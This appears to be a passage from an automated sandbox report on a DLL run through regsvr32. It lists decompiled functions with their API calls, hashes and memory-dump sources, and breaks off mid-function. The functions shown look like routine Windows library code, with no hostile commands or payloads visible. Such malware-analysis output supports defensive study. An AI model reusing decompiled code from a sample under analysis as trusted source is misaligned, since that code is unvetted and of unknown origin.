                                                                        • Instruction ID: f1a830ef30183d99209262c84c87e780bb224e30df7a02b89f1332faec0a7339
                                                                        • Opcode Fuzzy Hash: 5dc5c312d13e401fcfbadd669c1a0a16765e23d0604991783c5979921889d443
                                                                        • Instruction Fuzzy Hash: 4C11B929A1021DAACF01EBE59C458AF7B7CEF44750B41405BF805E7211EB74D681CB9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000D0B9 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 37%
                                                                        			E1000D0B9(signed int _a4, signed int* _a8, intOrPtr _a12) {
				void* _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t14;
				}
				_t23 = _a4;
				if((_t23 & 0x00000020) == 0) {
					_t16 = (_t23 & 0x0000ffff) - 8;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t16;
					}
					_t17 = _t16 - 1;
					__eflags = _t17;
					if(_t17 == 0) {
						L13:
						_t16 =  *_t31;
						__eflags = _t16;
						if(_t16 == 0) {
							goto L17;
						}
						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
						goto L16;
					}
					_t16 = _t17 - 3;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t18 = _t16 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						goto L13;
					}
					_t16 = _t18 - 0x7b;
					__eflags = _t16;
					if(__eflags == 0) {
						E1000D03C( &_a8, __eflags, _a12);
						_t20 = _a8;
						__eflags = _t20;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
						}
						_t16 = L1000C8E6( &_a8);
					}
					goto L17;
				}
				_t16 =  *_t31;
				if(_t16 == 0) {
					goto L17;
				}
				__imp__#16(_t16);
				goto L16;
			}










                                                                        0x1000d0bd
                                                                        0x1000d0c2
                                                                        0x1000d15d
                                                                        0x1000d15d
                                                                        0x1000d0c9
                                                                        0x1000d0cf
                                                                        0x1000d0e3
                                                                        0x1000d0e3
                                                                        0x1000d0e6
                                                                        0x1000d137
                                                                        0x1000d13d
                                                                        0x1000d13d
                                                                        0x1000d140
                                                                        0x1000d143
                                                                        0x1000d154
                                                                        0x1000d154
                                                                        0x00000000
                                                                        0x1000d15a
                                                                        0x1000d0e8
                                                                        0x1000d0e8
                                                                        0x1000d0e9
                                                                        0x1000d127
                                                                        0x1000d127
                                                                        0x1000d129
                                                                        0x1000d12b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000d130
                                                                        0x00000000
                                                                        0x1000d130
                                                                        0x1000d0eb
                                                                        0x1000d0eb
                                                                        0x1000d0ee
                                                                        0x1000d11f
                                                                        0x00000000
                                                                        0x1000d11f
                                                                        0x1000d0f0
                                                                        0x1000d0f0
                                                                        0x1000d0f1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000d0f3
                                                                        0x1000d0f3
                                                                        0x1000d0f6
                                                                        0x1000d0fe
                                                                        0x1000d103
                                                                        0x1000d106
                                                                        0x1000d108
                                                                        0x1000d111
                                                                        0x1000d111
                                                                        0x1000d117
                                                                        0x1000d117
                                                                        0x00000000
                                                                        0x1000d0f6
                                                                        0x1000d0d1
                                                                        0x1000d0d5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000d0d8
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ArrayDestroyFreeSafeTask
                                                                        • String ID:
                                                                        • API String ID: 3253174383-0
                                                                        • Opcode ID: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                        • Instruction ID: d5df2e689e9d8d1315e3bdacc16dfbb058a5afc5faf3f73fb235713c606ee203
                                                                        • Opcode Fuzzy Hash: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                        • Instruction Fuzzy Hash: E711563010020ABBFB55EF66DC84BEE77A8EF457D0F10441AFA858A198CF35EA00CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100306DB Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E100306DB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t35;
				int _t39;
				void* _t49;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				_t39 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t39, _t21);
				OffsetRect(_t49 + 0x48, _t39, _v8);
				OffsetRect(_t49 + 0x38, _t39, _v8);
				OffsetRect(_t49 + 0x58, _t39, _v8);
				_t51 =  *((intOrPtr*)(_t49 + 0x80));
				 *((intOrPtr*)(_t49 + 4)) = _a4;
				 *((intOrPtr*)(_t49 + 8)) = _a8;
				if( *((intOrPtr*)(_t49 + 0x80)) == 0) {
					_t35 = E100301DC();
				} else {
					_t35 = 0;
				}
				 *((intOrPtr*)(_t49 + 0x74)) = _t35;
				return E10030582(_t49, _t51, 0);
			}








                                                                        0x100306de
                                                                        0x100306df
                                                                        0x100306e5
                                                                        0x100306ed
                                                                        0x100306f9
                                                                        0x100306fc
                                                                        0x10030704
                                                                        0x1003070f
                                                                        0x1003071a
                                                                        0x10030725
                                                                        0x10030727
                                                                        0x10030731
                                                                        0x10030737
                                                                        0x1003073a
                                                                        0x10030742
                                                                        0x1003073c
                                                                        0x1003073c
                                                                        0x1003073c
                                                                        0x1003074b
                                                                        0x10030757

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 177026234-0
                                                                        • Opcode ID: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                        • Instruction ID: 422a5061f760cbc8c05fd093b4a9fb31e1b7e654ec4c61e66631bb08b1bca8e5
                                                                        • Opcode Fuzzy Hash: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                        • Instruction Fuzzy Hash: 3D110CB6600608BFD711DFEDC994DABB7ECEF48210F00882AF54AD7610E670FA408B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001EFFC Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E1001EFFC(void* __ecx) {
				void* _v8;
				signed short _t23;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed short _t34;
				void* _t36;
				signed short* _t39;
				signed short _t41;

				_push(__ecx);
				_t36 = __ecx;
				_t39 =  *(__ecx + 0x5c);
				_v8 =  *((intOrPtr*)(__ecx + 0x58));
				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
					_t32 =  *(E100373B5() + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
				}
				if(_v8 != 0) {
					_t39 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t39 != 0) {
					_t34 =  *_t39;
					if(_t39[1] != 0xffff) {
						_t23 = _t39[5];
						_t41 = _t39[6];
					} else {
						_t34 = _t39[6];
						_t23 = _t39[9];
						_t41 = _t39[0xa];
					}
					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t36 + 0x54) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}











                                                                        0x1001efff
                                                                        0x1001f003
                                                                        0x1001f00c
                                                                        0x1001f00f
                                                                        0x1001f012
                                                                        0x1001f019
                                                                        0x1001f030
                                                                        0x1001f030
                                                                        0x1001f037
                                                                        0x1001f042
                                                                        0x1001f042
                                                                        0x1001f046
                                                                        0x1001f049
                                                                        0x1001f051
                                                                        0x1001f053
                                                                        0x1001f062
                                                                        0x1001f066
                                                                        0x1001f055
                                                                        0x1001f055
                                                                        0x1001f058
                                                                        0x1001f05c
                                                                        0x1001f05c
                                                                        0x1001f06f
                                                                        0x1001f07b
                                                                        0x1001f07b
                                                                        0x1001f06f
                                                                        0x1001f081
                                                                        0x1001f086
                                                                        0x1001f086
                                                                        0x1001f092

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F022
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1001F02A
                                                                        • LockResource.KERNEL32(00000000), ref: 1001F03C
                                                                        • FreeResource.KERNEL32(00000000), ref: 1001F086
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLock
                                                                        • String ID:
                                                                        • API String ID: 1078018258-0
                                                                        • Opcode ID: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                        • Instruction ID: f62bb37731aceb1cfac18bd5f8f11ebe971a113ae325be4be6212f910cba7098
                                                                        • Opcode Fuzzy Hash: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                        • Instruction Fuzzy Hash: 8711E73A500715EFD722EFA1C988AABB7B4FF18794F00815CE8429B652D770EC84CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100257A8 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E100257A8(void* __ecx, void* __esi) {
				void* _v8;
				void* __ebp;
				void* _t9;
				void* _t11;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t35;

				_t32 = __esi;
				_push(__ecx);
				_t23 = __ecx;
				_t9 = E1001F77E(0x10);
				_t36 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10025742(_t9, _t36, 0xffffffff);
				}
				_push(_t32);
				_t11 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2) == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E100271C6(_t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}











                                                                        0x100257a8
                                                                        0x100257ab
                                                                        0x100257b0
                                                                        0x100257b2
                                                                        0x100257b7
                                                                        0x100257ba
                                                                        0x100257c9
                                                                        0x100257c9
                                                                        0x100257bc
                                                                        0x100257c5
                                                                        0x100257c5
                                                                        0x100257cb
                                                                        0x100257dc
                                                                        0x100257ee
                                                                        0x100257f2
                                                                        0x100257fa
                                                                        0x100257fa
                                                                        0x10025807
                                                                        0x10025807
                                                                        0x1002580f
                                                                        0x10025815
                                                                        0x1002581d

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 100257DC
                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 100257E2
                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 100257E5
                                                                        • GetLastError.KERNEL32(?), ref: 10025800
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentProcess$DuplicateErrorHandleLast
                                                                        • String ID:
                                                                        • API String ID: 3907606552-0
                                                                        • Opcode ID: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                        • Instruction ID: ac2035d42823edd271a7cb90e834c31b18cb545283139df8f74de7ed2b30b58d
                                                                        • Opcode Fuzzy Hash: 11538b09ad9ddda7391d08133ea87a958c9f6af064afdfc5abc666ebaf632c0d
                                                                        • Instruction Fuzzy Hash: 9A01D435740204AFEB01DBA9EC89F5A7BA8EF84761F104515F905CF182EB71EC0097A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001D8A6 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E1001D8A6(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t20;
				struct HWND__* _t21;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t20 = GetParent(_t24);
					if(_t20 == 0 || E10029A8E(_t20, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t21 = E10029C98(_t24, _v12.x, _v12.y);
						if(_t21 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t21);
							_t9 = _t21;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t20;
					}
				}
				return _t9;
			}











                                                                        0x1001d8ab
                                                                        0x1001d8b1
                                                                        0x1001d8b4
                                                                        0x1001d8b7
                                                                        0x1001d8ba
                                                                        0x1001d8bd
                                                                        0x1001d8c3
                                                                        0x1001d8c7
                                                                        0x1001d8d1
                                                                        0x1001d8d5
                                                                        0x1001d8ec
                                                                        0x1001d8fe
                                                                        0x1001d902
                                                                        0x1001d911
                                                                        0x1001d911
                                                                        0x1001d904
                                                                        0x1001d905
                                                                        0x1001d90d
                                                                        0x1001d90f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001d90f
                                                                        0x1001d8e3
                                                                        0x1001d8e3
                                                                        0x1001d8e3
                                                                        0x1001d913
                                                                        0x1001d916

                                                                        APIs
                                                                        • WindowFromPoint.USER32(?,?), ref: 1001D8BD
                                                                        • GetParent.USER32(00000000), ref: 1001D8CB
                                                                        • ScreenToClient.USER32 ref: 1001D8EC
                                                                        • IsWindowEnabled.USER32(00000000), ref: 1001D905
                                                                          • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientEnabledFromLongParentPointScreen
                                                                        • String ID:
                                                                        • API String ID: 2204725058-0
                                                                        • Opcode ID: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                        • Instruction ID: b169f4ebd7b1781a2425983f4991e3855304b76673034f1eafd2744fb62dc6a9
                                                                        • Opcode Fuzzy Hash: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                        • Instruction Fuzzy Hash: D3014F3A600615BFDB12FB59CC44DAE7BB9EF89690B11416AF901DB211EB30DE40DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10022B16 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 62%
                                                                        			E10022B16(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				struct HWND__* _t23;

				_t16 = GetTopWindow(_a4);
				while(1) {
					_t23 = _t16;
					if(_t23 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t23, _a8, _a12, _a16);
					} else {
						_push(_t23);
						_t20 = E10022115();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E1002283F();
						}
					}
					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
						E10022B16(_t23, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t23, 2);
				}
				return _t16;
			}







                                                                        0x10022b24
                                                                        0x10022b87
                                                                        0x10022b87
                                                                        0x10022b8b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10022b2c
                                                                        0x10022b56
                                                                        0x10022b2e
                                                                        0x10022b2e
                                                                        0x10022b2f
                                                                        0x10022b36
                                                                        0x10022b38
                                                                        0x10022b3b
                                                                        0x10022b3e
                                                                        0x10022b41
                                                                        0x10022b44
                                                                        0x10022b45
                                                                        0x10022b45
                                                                        0x10022b36
                                                                        0x10022b60
                                                                        0x10022b79
                                                                        0x10022b79
                                                                        0x10022b81
                                                                        0x10022b81
                                                                        0x10022b90

                                                                        APIs
                                                                        • GetTopWindow.USER32(?), ref: 10022B24
                                                                        • GetTopWindow.USER32(00000000), ref: 10022B63
                                                                        • GetWindow.USER32(00000000,00000002), ref: 10022B81
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window
                                                                        • String ID:
                                                                        • API String ID: 2353593579-0
                                                                        • Opcode ID: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                        • Instruction ID: 59ebec99428bed81cbae9e399db4f0855efa5802a24bdab8832a78d2f0a6533d
                                                                        • Opcode Fuzzy Hash: f20903795edc35669258cf1f74e1e4e851f1226be1756a02d54bb3e882155ab8
                                                                        • Instruction Fuzzy Hash: FC01A93600151ABBDF13AFE1AC05EDF3B6AEF45391F814011FA1455062C736D971EBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10022422 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E10022422(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t13;
				struct HWND__* _t15;
				struct HWND__* _t16;
				void* _t17;

				_t13 = __ecx;
				_t15 = GetDlgItem(_a4, _a8);
				if(_t15 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t16 = _t10;
						if(_t16 == 0) {
							goto L10;
						}
						_t10 = E10022422(_t13, _t16, _a8, _a12);
						if(_t10 == 0) {
							_t10 = GetWindow(_t16, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t15) == 0) {
						L3:
						_push(_t15);
						if(_a12 == 0) {
							return E100220EE(_t17);
						}
						_t10 = E10022115();
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E10022422(_t13, _t15, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}









                                                                        0x10022422
                                                                        0x10022439
                                                                        0x1002243d
                                                                        0x1002246d
                                                                        0x10022470
                                                                        0x1002248d
                                                                        0x1002248d
                                                                        0x10022491
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002247b
                                                                        0x10022482
                                                                        0x10022487
                                                                        0x00000000
                                                                        0x10022487
                                                                        0x00000000
                                                                        0x10022482
                                                                        0x1002243f
                                                                        0x10022444
                                                                        0x10022456
                                                                        0x1002245a
                                                                        0x1002245b
                                                                        0x00000000
                                                                        0x1002245d
                                                                        0x10022464
                                                                        0x1002246b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10022446
                                                                        0x1002244d
                                                                        0x10022454
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10022454
                                                                        0x10022444
                                                                        0x10022496
                                                                        0x10022496

                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 1002242D
                                                                        • GetTopWindow.USER32(00000000), ref: 10022440
                                                                          • Part of subcall function 10022422: GetWindow.USER32(00000000,00000002), ref: 10022487
                                                                        • GetTopWindow.USER32(?), ref: 10022470
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item
                                                                        • String ID:
                                                                        • API String ID: 369458955-0
                                                                        • Opcode ID: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                        • Instruction ID: cbb5f4ea75b5981124a7b3c1720515b8597a7f038d3602274fac482962cbe2a9
                                                                        • Opcode Fuzzy Hash: b9e1787de5e7a1ed3ad65300bc5edf47a0a497a9be77156916138b2de0f7076e
                                                                        • Instruction Fuzzy Hash: A701623650166BBBDB23BFE2BC00E9F3B99EF462E4F828121FD0499111D731D9629691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002B47F Relevance: 6.0, APIs: 4, Instructions: 48registryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002B47F(void* __ecx, void* __edi, void* __esi, CHAR* _a4, CHAR* _a8, char _a12) {
				intOrPtr _v8;
				char _v24;
				intOrPtr _t15;
				long _t22;
				void* _t31;
				void* _t32;

				_t15 =  *0x1004c470; // 0x303bb91f
				_t31 = __ecx;
				_v8 = _t15;
				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					wsprintfA( &_v24, 0x1003cc28, _a12);
					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
				} else {
					_t32 = E10035959(__ecx, _a4);
					if(_t32 != 0) {
						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
						RegCloseKey(_t32);
						_t19 = 0 | _t22 == 0x00000000;
					}
				}
				return E100117AE(_t19, _v8);
			}









                                                                        0x1002b485
                                                                        0x1002b48b
                                                                        0x1002b491
                                                                        0x1002b494
                                                                        0x1002b4d8
                                                                        0x1002b4ee
                                                                        0x1002b496
                                                                        0x1002b49e
                                                                        0x1002b4a2
                                                                        0x1002b4b3
                                                                        0x1002b4bc
                                                                        0x1002b4c6
                                                                        0x1002b4c9
                                                                        0x1002b4a2
                                                                        0x1002b4fe

                                                                        APIs
                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002B4B3
                                                                        • RegCloseKey.ADVAPI32(00000000,?,?), ref: 1002B4BC
                                                                        • wsprintfA.USER32 ref: 1002B4D8
                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B4EE
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ClosePrivateProfileStringValueWritewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1902064621-0
                                                                        • Opcode ID: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                        • Instruction ID: 9a6bc9ffc77bb201adb5d4a8a8e7071db867b7f7a5a0f8b8952f6efe61c2a51a
                                                                        • Opcode Fuzzy Hash: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
                                                                        • Instruction Fuzzy Hash: A001403250161AEFDB02EFA5CD45E9E3BB8FF44754F044415FA04EB152DB71DA118B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10031D85 Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10031D85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				char _v268;
				int _v272;
				void* __ebp;
				intOrPtr _t14;
				int _t24;
				intOrPtr* _t30;
				void* _t33;

				_t14 =  *0x1004c470; // 0x303bb91f
